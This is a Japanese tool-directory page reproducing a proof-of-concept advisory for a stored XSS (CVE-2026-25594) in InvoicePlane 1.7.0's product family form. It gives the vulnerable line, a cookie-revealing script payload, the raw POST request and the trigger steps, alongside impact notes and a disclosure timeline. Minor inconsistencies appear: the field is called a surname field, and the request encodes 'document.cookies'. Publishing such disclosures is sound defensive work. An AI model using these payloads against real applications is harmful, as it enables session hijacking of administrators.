Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
ツール/GitHubGitHub/lagathos/cve-2026-25594
脆弱性分析エクスプロイトウェブアプリケーション悪用ウェブセキュリティ学習と教育
GitHublagathos/cve-2026-25594

CVE-2026-25594

# InvoicePlane 1.7.0 の姓フィールドを介した保存型XSSの概念実証(ペイロード、リクエスト、防御研究のための影響分析を含む)

リポジトリを見る
5ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2026-25594 — InvoicePlane 1.7.0 の姓フィールドを介した格納型XSS

脆弱性: 姓フィールドを介した格納型クロスサイトスクリプティング(XSS)

製品: InvoicePlane

影響を受けるバージョン: 1.7.0(およびそれ以前のバージョンの可能性あり)

深刻度: 中

CVSS 3.1 スコア: 4.8(CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N)

CWE: CWE-79: ウェブページ生成時の入力の不適切な無害化

発見者: Leonidas Agathos

報告日: 2026-01-31


説明

製品ファミリーフォーム(/index.php/families/form)の family_name フィールドは、サニタイズなしで任意の入力を受け入れます。この値はデータベースに保存され、後で製品作成・編集ページのファミリードロップダウンでエンコードされずにレンダリングされるため、製品フォームにアクセスする管理者のブラウザでJavaScriptが実行されます。

脆弱なファイル: application/modules/products/views/form.php:40

root@kitploit:~
// Line 40
><?php echo $family->family_name; ?></option>

概念実証

ステップ1 — 姓フィールドにペイロードを注入

/index.php/families/form に移動し、姓として以下を送信します:

root@kitploit:~
<script>alert('domain:'+document.domain+'cookies:'+document.cookie)</script>

リクエスト:

root@kitploit:~
POST /index.php/families/form HTTP/1.1
Host: 172.25.0.12
Content-Type: application/x-www-form-urlencoded

_ip_csrf=...&btn_submit=1&is_update=0&family_name=%3Cscript%3Ealert%28document.cookies%29%3C%2Fscript%3E

ステップ1 - Burp Suiteを使用して姓フィールドにXSSペイロードを注入

ステップ2 — XSSをトリガー

/index.php/products/form に移動します。ファミリードロップダウンがレンダリングされるとペイロードが実行されます。

ステップ2 - 製品フォームページでXSSが実行され、ドメインとクッキーが漏洩


影響

製品作成・編集ページにアクセスする管理者は、ブラウザでペイロードが実行されます。これにより、セッションハイジャック(クッキーがHttpOnlyでない場合)、CSRFトークンの窃取、被害者の身份で実行される操作が可能になります。


タイムライン

日付イベント
2026-01-30脆弱性を発見
2026-01-31概念実証を作成
2026-01-31ベンダーに通知
2026-02-04ベンダーが確認
2026-02-04パッチをリリース
2026-02-05公開開示

参考情報

  • CWE-79
  • OWASP: クロスサイトスクリプティング(XSS)
  • CVE-2026-25594

免責事項

この脆弱性は、独立したセキュリティ研究の過程で発見されました。すべての情報は、ベンダーおよびセキュリティコミュニティがこの問題を理解し、修正するのを支援するための教育、研究、防御目的でのみ提供されています。この情報の悪意のある使用は固く禁じられています。

ツールをダウンロード